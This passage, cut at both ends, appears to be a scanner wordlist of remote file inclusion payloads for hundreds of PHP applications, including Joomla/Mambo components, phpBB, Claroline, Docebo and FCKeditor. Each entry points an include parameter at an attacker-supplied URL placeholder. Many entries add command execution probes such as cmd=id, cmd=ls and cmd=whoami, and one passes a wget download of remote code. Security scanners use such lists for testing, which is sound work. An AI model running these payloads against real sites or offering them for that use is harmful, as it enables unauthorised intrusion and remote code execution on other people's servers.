ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=XXpathXX?\n/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=XXpathXX\n/administrator/components/com_webring/admin.webring.docs.php?component_dir=XXpathXX?\n/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=XXpathXX\n/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=XXpathXX\n/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=XXpathXX?\n/administrator/menu_add.php?site_absolute_path=XXpathXX?\n/administrator/menu_operation.php?site_absolute_path=XXpathXX?\n/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=XXpathXX\n/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=XXpathXX?\n/adodb/adodb-errorpear.inc.php?ourlinux_root_path=XXpathXX\n/adodb/adodb-pear.inc.php?ourlinux_root_path=XXpathXX\n/adodb/adodb.inc.php?path=XXpathXX\n/advanced_comment_system/admin.php?ACS_path=XXpathXX?\n/advanced_comment_system/index.php?ACS_path=XXpathXX?\n/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=XXpathXX?\n/agenda.php3?rootagenda=XXpathXX\n/agenda2.php3?rootagenda=XXpathXX\n/aides/index.php?page=XXpathXX?\n/ains_main.php?ains_path=XXpathXX\n/ajax/loadsplash.php?full_path=XXpathXX\n/ajouter.php?include=XXpathXX?\n/akarru.gui/main_content.php?bm_content=XXpathXX\n/akocomments.php?mosConfig_absolute_path=XXpathXX\n/amazon/cart.php?cmd=add&asin=XXpathXX\n/amazon/index.php?lang=XXpathXX\n/amazon/info.php?asin=XXpathXX\n/annonce.php?page=XXpathXX?&cmd=id\n/announcements.php?phpraid_dir=XXpathXX\n/anzagien.php?config[root_ordner]=XXpathXX?cmd=id\n/apbn/templates/head.php?APB_SETTINGS[template_path]=XXpathXX\n/api.php?t_path_core=XXpathXX?&cmd=id\n/apps/apps.php?app=XXpathXX\n/appserv/main.php?appserv_root=XXpathXX\n/arab3upload/customize.php?path=XXpathXX?&cmd=pwd\n/arab3upload/initialize.php?path=XXpathXX?&cmd=pwd\n/arash_lib/class/arash_gadmin.class.php?arashlib_dir=XXpathXX\n/arash_lib/class/arash_sadmin.class.php?arashlib_dir=XXpathXX\n/arash_lib/include/edit.inc.php?arashlib_dir=XXpathXX\n/arash_lib/include/list_features.inc.php?arashlib_dir=XXpathXX\n/archive.php?scriptpath=XXpathXX?\n/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=XXpathXX%00\n/artlist.php?root_path=XXpathXX\n/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=XXpathXX?cmd\n/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?\n/athena.php?athena_dir=XXpathXX\n/auction/auction_common.php?phpbb_root_path=XXpathXX\n/auction/includes/converter.inc.php?include_path=XXpathXX?\n/auction/includes/messages.inc.php?include_path=XXpathXX?\n/auction/includes/settings.inc.php?include_path=XXpathXX?\n/auction/phpAdsNew/view.inc.php?phpAds_path=XXpathXX\n/auth.cookie.inc.php?da_path=XXpathXX\n/auth.header.inc.php?da_path=XXpathXX\n/auth.sessions.inc.php?da_path=XXpathXX\n/auth/auth.php?phpbb_root_path=XXpathXX\n/auth/auth_phpbb/phpbb_root_path=XXpathXX\n/authenticate.php?default_path_for_themes=XXpathXX?\n/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=XXpathXX\n/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=XXpathXX\n/auto_check_renewals.php?installed_config_file=XXpathXX?cmd=ls\n/autoindex.php?cfg_file=XXpathXX?\n/awzmb/adminhelp.php?Setting[OPT_includepath]=XXpathXX\n/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=XXpathXX\n/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=XXpathXX\n/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=XXpathXX\n/awzmb/modules/help.incl.php?Setting[OPT_includepath]=XXpathXX\n/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=XXpathXX\n/axoverzicht.cgi?maand=XXpathXX\n/b2-tools/gm-2-b2.php?b2inc=XXpathXX\n/b2verifauth.php?index=XXpathXX?\n/backend/addons/links/index.php?PATH=XXpathXX\n/basebuilder/src/main.inc.php?mj_config[src_path]=XXpathXX???\n/bb_admin.php?includeFooter=XXpathXX\n/beacon/language/1/splash.lang.php?languagePath=XXpathXX\n/beacon/language/1/splash.lang.php?languagePath=XXpathXX?\n/belegungsplan/jahresuebersicht.inc.php?root=XXpathXX\n/belegungsplan/monatsuebersicht.inc.php?root=XXpathXX\n/belegungsplan/tagesuebersicht.inc.php?root=XXpathXX\n/belegungsplan/wochenuebersicht.inc.php?root=XXpathXX\n/bemarket/postscript/postscript.php?p_mode=XXpathXX\n/biblioteca/bib_form.php?CLASSPATH=XXpathXX\n/biblioteca/bib_pldetails.php?CLASSPATH=XXpathXX\n/biblioteca/bib_plform.php?CLASSPATH=XXpathXX\n/biblioteca/bib_plsearchc.php?CLASSPATH=XXpathXX\n/biblioteca/bib_plsearchs.php?CLASSPATH=XXpathXX\n/biblioteca/bib_save.php?CLASSPATH=XXpathXX\n/biblioteca/bib_searchc.php?CLASSPATH=XXpathXX\n/biblioteca/bib_searchs.php?CLASSPATH=XXpathXX\n/biblioteca/edi_form.php?CLASSPATH=XXpathXX\n/biblioteca/edi_save.php?CLASSPATH=XXpathXX\n/biblioteca/gen_form.php?CLASSPATH=XXpathXX\n/biblioteca/gen_save.php?CLASSPATH=XXpathXX\n/biblioteca/lin_form.php?CLASSPATH=XXpathXX\n/biblioteca/lin_save.php?CLASSPATH=XXpathXX\n/biblioteca/luo_form.php?CLASSPATH=XXpathXX\n/biblioteca/luo_save.php?CLASSPATH=XXpathXX\n/biblioteca/sog_form.php?CLASSPATH=XXpathXX\n/biblioteca/sog_save.php?CLASSPATH=XXpathXX\n/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX\n/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?\n/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?\n/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?\n/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX?\n/bild.php?config[root_ordner]=XXpathXX?&cmd=id\n/bin/qte_init.php?qte_root=XXpathXX?\n/bingoserver.php3?response_dir=XXpathXX\n/block.php?Include=XXpathXX\n/blocks/birthday.php?full_path=XXpathXX\n/blocks/events.php?full_path=XXpathXX\n/blocks/help.php?full_path=XXpathXX\n/blogcms/admin/media.php?DIR_LIBS=XXpathXX?\n/blogcms/admin/xmlrpc/server.php?DIR_LIBS=XXpathXX?\n/blogcms/index.php?DIR_PLUGINS=XXpathXX?\n/board/post.php?qb_path=XXpathXX\n/boitenews4/index.php?url_index=XXpathXX?\n/books/allbooks.php?home=XXpathXX\n/books/home.php?home=XXpathXX\n/books/mybooks.php?home=XXpathXX\n/bp_ncom.php?bnrep=XXpathXX\n/bp_ncom.php?bnrep=XXpathXX?\n/bp_news.php?bnrep=XXpathXX\n/bridge/enigma/E2_header.inc.php?boarddir=XXpathXX?\n/bridge/yabbse.inc.php?sourcedir=XXpathXX\n/bridges/SMF/logout.php?path_to_smf=XXpathXX\n/bu/bu_cache.php?bu_dir=XXpathXX?\n/bu/bu_claro.php?bu_dir=XXpathXX?\n/bu/bu_parse.php?bu_dir=XXpathXX?\n/bu/process.php?bu_dir=XXpathXX?\n/buddy.php?CONFIG[MWCHAT_Libs]=XXpathXX?\n/builddb.php?env_dir=XXpathXX\n/button/settings_sql.php?path=XXpathXX\n/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=XXpathXX?\n/cal.func.php?dir_edge_lang=XXpathXX\n/calcul-page.php?home=XXpathXX\n/calendar.php?cfg_dir=XXpathXX?\n/calendar.php?lang=XXpathXX\n/calendar.php?path_to_calendar=XXpathXX\n/calendar.php?vwar_root=XXpathXX?\n/calendar/demo/index.php?date=&v=XXpathXX?\n/calendar/payment.php?insPath=XXpathXX\n/calendario/cal_insert.php?CLASSPATH=XXpathXX\n/calendario/cal_save.php?CLASSPATH=XXpathXX\n/calendario/cal_saveactivity.php?CLASSPATH=XXpathXX\n/cart.php?lang_list=XXpathXX\n/cart_content.php?cart_isp_root=XXpathXX\n/catalogg/inludes/include_once.php?include_file=XXpathXX\n/catalogshop.php?mosConfig_absolute_path=XXpathXX\n/cdsagenda/modification/SendAlertEmail.php?AGE=XXpathXX?\n/cfagcms/themes/default/index.php?main=XXpathXX\n/ch_readalso.php?read_xml_include=XXpathXX\n/challenge.php?vwar_root=XXpathXX\n/change_preferences2.php?target=XXpathXX?\n/chat.php?CONFIG[MWCHAT_Libs]=XXpathXX?\n/chat.php?my[root]=XXpathXX?cm=id\n/chat/adminips.php?banned_file=XXpathXX\n/chat/users_popupL.php3?From=XXpathXX\n/checkout.php?abs_path=XXpathXX\n/checkout.php?abs_path=XXpathXX?\n/ciamos_path/modules/forum/include/config.php?module_cache_path='XXpathXX'\n/circ.php?include_path=XXpathXX?\n/circolari/cir_save.php?CLASSPATH=XXpathXX\n/citywriter/head.php?path=XXpathXX?\n/cl_files/index.php?path_to_calendar=XXpathXX?\n/claroline/auth/ldap/authldap.php?includePath=XXpathXX\n/claroline/phpbb/page_tail.php?includePath=XXpathXX\n/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=XXpathXX?\n/class.mysql.php?path_to_bt_dir=XXpathXX\n/class/Wiki/Wiki.php?c_node[class_path]=XXpathXX\n/class/jpcache/jpcache.php?_PSL[classdir]=XXpathXX?exec=uname\n/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=XXpathXX\n/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=XXpathXX\n/classes/Cache.class.php?rootdir=XXpathXX?\n/classes/Customer.class.php?rootdir=XXpathXX?\n/classes/Performance.class.php?rootdir=XXpathXX?\n/classes/Project.class.php?rootdir=XXpathXX?\n/classes/Representative.class.php?rootdir=XXpathXX?\n/classes/User.class.php?rootdir=XXpathXX?\n/classes/admin_o.php?absolutepath=XXpathXX\n/classes/adodbt/sql.php?classes_dir=XXpathXX\n/classes/adodbt/sql.php?classes_dir=XXpathXX?\n/classes/board_o.php?absolutepath=XXpathXX\n/classes/class_admin.php?PathToComment=XXpathXX?\n/classes/class_comments.php?PathToComment=XXpathXX?\n/classes/class_mail.inc.php?path_to_folder=XXpathXX\n/classes/common.php?rootdir=XXpathXX?\n/classes/core/language.php?rootdir=XXpathXX\n/classes/dev_o.php?absolutepath=XXpathXX\n/classes/file_o.php?absolutepath=XXpathXX\n/classes/html/com_articles.php?absolute_path=XXpathXX\n/classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX\n/classes/query.class.php?baseDir=XXpathXX\n/classes/tech_o.php?absolutepath=XXpathXX\n/classified.php?insPath=XXpathXX\n/classified_right.php?language_dir=XXpathXX\n/classifieds/index.php?lowerTemplate=XXpathXX\n/clear.php?bibtexrootrel=XXpathXX?\n/clearinfo.php?bibtexrootrel=XXpathXX?\n/click.php?dir=XXpathXX?\n/client.php?dir=XXpathXX\n/client/faq_1/PageController.php?dir=XXpathXX\n/clients/index.php?src=XXpathXX\n/cls_fast_template.php?fname=XXpathXX\n/cm68news/engine/oldnews.inc.php?addpath=XXpathXX?&\n/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=XXpathXX?\n/cms/meetweb/classes/ManagerResource.class.php?root_path=XXpathXX\n/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=XXpathXX\n/cms/meetweb/classes/RegForm.class.php?root_path=XXpathXX\n/cms/meetweb/classes/RegResource.class.php?root_path=XXpathXX\n/cms/meetweb/classes/RegRightsResource.class.php?root_path=XXpathXX\n/cms/meetweb/classes/modules.php?root_path=XXpathXX\n/cms/modules/form.lib.php?sourceFolder=XXpathXX?\n/cms/system/openengine.php?oe_classpath=XXpathXX???\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=XXpathXX?\n/cn_config.php?tpath=XXpathXX?\n/coast/header.php?sections_file=XXpathXX?\n/code/berylium-classes.php?beryliumroot=XXpathXX?\n/code/display.php?admindir=XXpathXX?\n/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=XXpathXX\n/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?\n/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=XXpathXX?\n/com_media_library/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?\n/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?\n/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?\n/comments.php?AMG_serverpath=XXpathXX\n/comments.php?scriptpath=XXpathXX?\n/common.inc.php?CFG[libdir]=XXpathXX\n/common.inc.php?CFG[libdir]=XXpathXX?\n/common.inc.php?base_path=XXpathXX\n/common.php?db_file=XXpathXX\n/common.php?dir=XXpathXX\n/common.php?ezt_root_path=XXpathXX?\n/common.php?include_path=XXpathXX\n/common.php?livealbum_dir=XXpathXX?\n/common.php?locale=XXpathXX\n/common.php?phpht_real_path=XXpathXX?\n/common/db.php?commonpath=XXpathXX?\n/common/func.php?CommonAbsD=XXpathXX?\n/common/func.php?CommonAbsDir=XXpathXX\n/community/Offline.php?sourcedir=XXpathXX?\n/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=XXpathXX\n/components/calendar/com_calendar.php?absolute_path=XXpathXX?\n/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=XXpathXX\n/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=XXpathXX\n/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=XXpathXX\n/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=XXpathXX\n/components/com_articles.php?absolute_path=XXpathXX?\n/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=XXpathXX\n/components/com_calendar.php?absolute_path=XXpathXX?\n/components/com_cpg/cpg.php?mosConfig_absolute_path=XXpathXX?\n/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=XXpathXX\n/components/com_facileforms/facileforms.frame.php?ff_compath=XXpathXX\n/components/com_forum/download.php?phpbb_root_path=XXpathXX\n/components/com_galleria/galleria.html.php?mosConfig_absolute_path=XXpathXX\n/components/com_guestbook.php?absolute_path=XXpathXX?\n/components/com_hashcash/server.php?mosConfig_absolute_path=XXpathXX?\n/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=XXpathXX\n/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=XXpathXX\n/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=XXpathXX\n/components/com_joomlaboard/file_upload.php?sbp=XXpathXX?\n/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=XXpathXX?\n/components/com_lm/archive.php?mosConfig_absolute_path=XXpathXX?\n/components/com_mambowiki/MamboLogin.php?IP=XXpathXX?\n/components/com_minibb.php?absolute_path=XXpathXX\n/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=XXpathXX\n/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=XXpathXX\n/components/com_mospray/scripts/admin.php?basedir=XXpathXX?&cmd=id\n/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=XXpathXX\n/components/com_mp3_allopass/allopass.php?mosConfig_live_site=XXpathXX\n/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?\n/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=XXpathXX?\n/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=XXpathXX\n/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX\n/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=XXpathXX\n/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=XXpathXX\n/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=XXpathXX\n/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=XXpathXX?\n/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=XXpathXX\n/components/com_smf/smf.php?mosConfig_absolute_path=XXpathXX\n/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=XXpathXX\n/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=XXpathXX\n/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=XXpathXX\n/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=XXpathXX\n/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=XXpathXX\n/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=XXpathXX\n/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=XXpathXX\n/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=XXpathXX\n/components/core/connect.php?language_path=XXpathXX\n/components/minibb/bb_plugins.php?absolute_path=XXpathXX?\n/components/minibb/index.php?absolute_path=XXpathXX?\n/components/xmlparser/loadparser.php?absoluteurl=XXpathXX\n/compteur/mapage.php?chemin=XXpathXX\n/conf.php?securelib=XXpathXX\n/conf.php?securelib=XXpathXX?\n/config.inc.php3?rel_path=XXpathXX\n/config.inc.php?_path=XXpathXX\n/config.inc.php?path_escape=XXpathXX\n/config.inc.php?path_escape=XXpathXX%00\n/config.php?full_path=XXpathXX?\n/config.php?full_path_to_db=XXpathXX\n/config.php?fullpath=XXpathXX\n/config.php?incpath=XXpathXX\n/config.php?path_to_root=XXpathXX\n/config.php?rel_path=XXpathXX?\n/config.php?returnpath=XXpathXX\n/config.php?sql_language=XXpathXX?\n/config.php?xcart_dir=XXpathXX?\n/config/config_admin.php?INC=XXpathXX?\n/config/config_main.php?INC=XXpathXX?\n/config/config_member.php?INC=XXpathXX?\n/config/dbutil.bck.php?confdir=XXpathXX\n/config/mysql_config.php?INC=XXpathXX?\n/config/sender.php?ROOT_PATH=XXpathXX?\n/configuration.php?absolute_path=XXpathXX?\n/confirmUnsubscription.php?output=XXpathXX\n/connect.php?path=XXpathXX\n/connexion.php?DOCUMENT_ROOT=XXpathXX?\n/contact.php?blog_theme=XXpathXX\n/contacts.php?cal_dir=XXpathXX\n/contenido/external/frontend/news.php?cfg[path][includes]=XXpathXX\n/content.php?content=XXpathXX\n/content/admin.php?pwfile=XXpathXX\n/content/content.php?fileloc=XXpathXX?\n/content/delete.php?pwfile=XXpathXX\n/content/modify.php?pwfile=XXpathXX\n/content/modify_go.php?pwfile=XXpathXX\n/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=XXpathXX\n/contrib/mx_glance_sdesc.php?mx_root_path=XXpathXX\n/contrib/phpBB2/modules.php?phpbb_root_path=XXpathXX?\n/controllers/MySQLController.php?baseDir=XXpathXX\n/controllers/SQLController.php?baseDir=XXpathXX\n/controllers/SetupController.php?baseDir=XXpathXX\n/controllers/VideoController.php?baseDir=XXpathXX\n/controllers/ViewController.php?baseDir=XXpathXX\n/convert-date.php?cal_dir=XXpathXX\n/convert/mvcw.php?step=1&vwar_root=XXpathXX\n/convert/mvcw.php?vwar_root=XXpathXX\n/core/admin/admin.php?p=admin&absoluteurlXXpathXX\n/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlXXpathXX\n/core/admin/categories_add.php?absoluteurlXXpathXX\n/core/admin/categories_remove.php?absoluteurlXXpathXX\n/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlXXpathXX\n/core/admin/editdel.php?p=admin&absoluteurlXXpathXX\n/core/admin/ftpfeature.php?p=admin&absoluteurlXXpathXX\n/core/admin/login.php?absoluteurlXXpathXX\n/core/admin/pgRSSnews.php?absoluteurlXXpathXX\n/core/admin/showcat.php?absoluteurlXXpathXX\n/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlXXpathXX\n/core/archive_cat.php?absoluteurlXXpathXX\n/core/archive_nocat.php?absoluteurlXXpathXX\n/core/aural.php?site_absolute_path=XXpathXX\n/core/aural.php?site_absolute_path=XXpathXX?&cmd=dir\n/core/editor.php?editor_insert_bottom=XXpathXX\n/core/includes.php?CMS_ROOT=XXpathXX?\n/core/recent_list.php?absoluteurlXXpathXX\n/corpo.php?pagina=XXpathXX\n/cp2.php?securelib=XXpathXX?\n/cpe/index.php?repertoire_config=XXpathXX\n/crea.php?plancia=XXpathXX\n/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=XXpathXX?\n/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=XXpathXX?\n/creat_news_all.php?language=XXpathXX\n/create_file.php?target=XXpathXX?\n/cron.php?ROOT_PATH=XXpathXX\n/cron.php?include_path=XXpathXX?\n/crontab/run_billing.php?config[include_dir]=XXpathXX?\n/cross.php?url=XXpathXX\n/custom_vars.php?sys[path_addon]=XXpathXX\n/customer/product.php?xcart_dir=XXpathXX\n/cwb/comanda.php?INCLUDE_PATH=XXpathXX?\n/datei.php?config[root_ordner]=XXpathXX?&cmd=id\n/db/PollDB.php?CONFIG_DATAREADERWRITER=XXpathXX?\n/db/mysql/db.inc.php?SPL_CFG[dirroot]=XXpathXX?\n/dbcommon/include.php?_APP_RELATIVE_PATH=XXpathXX\n/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=XXpathXX\n/debugger.php?config_atkroot=XXpathXX\n/decoder/gallery.php?ccms_library_path=XXpathXX\n/decoder/markdown.php?ccms_library_path=XXpathXX\n/defaults_setup.php?ROOT_PATH=XXpathXX?cmd=ls\n/defines.php?WEBCHATPATH=XXpathXX?\n/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=XXpathXX&\n/depouilg.php3?NomVote=XXpathXX?\n/development.php?root_prefix=XXpathXX?\n/dfcode.php?DFORUM_PATH=XXpathXX?\n/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=XXpathXX?\n/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=XXpathXX?\n/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX\n/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX?\n/dialog.php?CONFIG[MWCHAT_Libs]=XXpathXX?\n/dialogs/a.php?spaw_dir=XXpathXX?&cmd=id\n/dialogs/collorpicker.php?spaw_dir=XXpathXX&cmd=id\n/dialogs/img.php?spaw_dir=XXpathXX?&cmd=id\n/dialogs/img_library.php?spaw_dir=XXpathXX?&cmd=id\n/dialogs/table.php?spaw_dir=XXpathXX?&cmd=id\n/dialogs/td.php?spaw_dir=XXpathXX?&cmd=id\n/digitaleye_Path/module.php?menu=XXpathXX?\n/dir/prepend.php?_PX_config[manager_path]=XXpathXX\n/dir_thatware/config.php?root_path=XXpathXX'\n/direct.php?rf=XXpathXX\n/direction/index.php?repertoire_config=XXpathXX\n/directory/index.php?path=XXpathXX\n/display.php?pag=XXpathXX\n/display.php?path=XXpathXX\n/displayCategory.php?basepath=XXpathXX\n/dix.php3?url_phpartenaire=XXpathXX\n/dm-albums/template/album.php?SECURITY_FILE=XXpathXX\n/doc/admin/index.php?ptinclude=XXpathXX\n/doceboCore/lib/lib.php?GLOBALS[where_framework]=XXpathXX\n/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=XXpathXX\n/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=XXpathXX\n/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=XXpathXX\n/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=XXpathXX\n/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=XXpathXX\n/docs/front-end-demo/cart2.php?workdir=XXpathXX?\n/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=XXpathXX?&cmd=wget%20XXpathXX\n/dosearch.php?RESPATH=XXpathXX\n/download.php?root_prefix=XXpathXX?\n/download_engine_V1.4.3/addmember.php?eng_dir=XXpathXX\n/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=XXpathXX\n/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=XXpathXX\n/downstat1.8/chart.php?art=XXpathXX?\n/dp_logs.php?HomeDir=XXpathXX\n/eXPerience2/modules.php?file=XXpathXX\n/ea-gBook/index_inc.php?inc_ordner=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1\n/edit.php?javascript_path=XXpathXX?\n/editor.php?newsfile=XXpathXX\n/editprofile.php?pathtohomedir=XXpathXX?\n/editsite.php?returnpath=XXpathXX\n/editx/add_address.php?include_dir=XXpathXX\n/elseif/contenus.php?contenus=XXpathXX\n/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=XXpathXX\n/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=XXpathXX\n/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=XXpathXX\n/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=XXpathXX\n/elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX\n/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=XXpathXX\n/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=XXpathXX\n/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=XXpathXX\n/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=XXpathXX\n/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=XXpathXX\n/email_subscribe.php?root_prefix=XXpathXX?\n/embed/day.php?path=XXpathXX\n/enc/content.php?Home_Path=XXpathXX?\n/engine/Ajax/editnews.php?root_dir=XXpathXX\n/engine/api/api.class.php?dle_config_api=XXpathXX?\n/engine/engine.inc.php?absolute_path=XXpathXX\n/engine/init.php?root_dir=XXpathXX\n/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=XXpathXX?\n/enth3/show_joined.php?path=XXpathXX\n/environment.php?DIR_PREFIX=XXpathXX\n/epal/index.php?view=XXpathXX?\n/errors.php?error=XXpathXX\n/errors/configmode.php?GALLERY_BASEDIR=XXpathXX\n/errors/needinit.php?GALLERY_BASEDIR=XXpathXX\n/errors/reconfigure.php?GALLERY_BASEDIR=XXpathXX\n/errors/unconfigured.php?GALLERY_BASEDIR=XXpathXX\n/es_custom_menu.php?files_dir=XXpathXX\n/es_desp.php?files_dir=XXpathXX\n/es_offer.php?files_dir=XXpathXX\n/eshow.php?Config_rootdir=XXpathXX\n/esupport/admin/autoclose.php?subd=XXpathXX?\n/eva/index.php3?aide=XXpathXX?\n/eva/index.php3?perso=XXpathXX\n/eva/index.php?eva[caminho]=XXpathXX\n/event.php?myevent_path=XXpathXX\n/event_cal/module/embed/day.php?path=XXpathXX\n/eventcal2.php.php?path_simpnews=XXpathXX\n/eventscroller.php?path_simpnews=XXpathXX\n/example-view/templates/article.php?globals[content_dir]=XXpathXX?\n/example-view/templates/dates_list.php?globals[content_dir]=XXpathXX?\n/example-view/templates/root.php?globals[content_dir]=XXpathXX?\n/example.php?site=XXpathXX\n/example/gamedemo/inc.functions.php?projectPath=XXpathXX?\n/examplefile.php?bibtexrootrel=XXpathXX?\n/examples/patExampleGen/bbcodeSource.php?example=XXpathXX\n/exception/include.php?_APP_RELATIVE_PATH=XXpathXX\n/extauth/drivers/ldap.inc.php?clarolineRepositorySys=XXpathXX\n/extras/mt.php?web_root=XXpathXX\n/extras/poll/poll.php?file_newsportal=XXpathXX\n/ezusermanager_pwd_forgott.php?ezUserManager_Path=XXpathXX\n/faq.php?module_root_path=XXpathXX\n/faq.php?phpbb_root_path=XXpathXX\n/fckeditor/editor/dialog/fck_link.php?dirroot=XXpathXX\n/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=XXpathXX\n/fckeditor/editor/filemanager/browse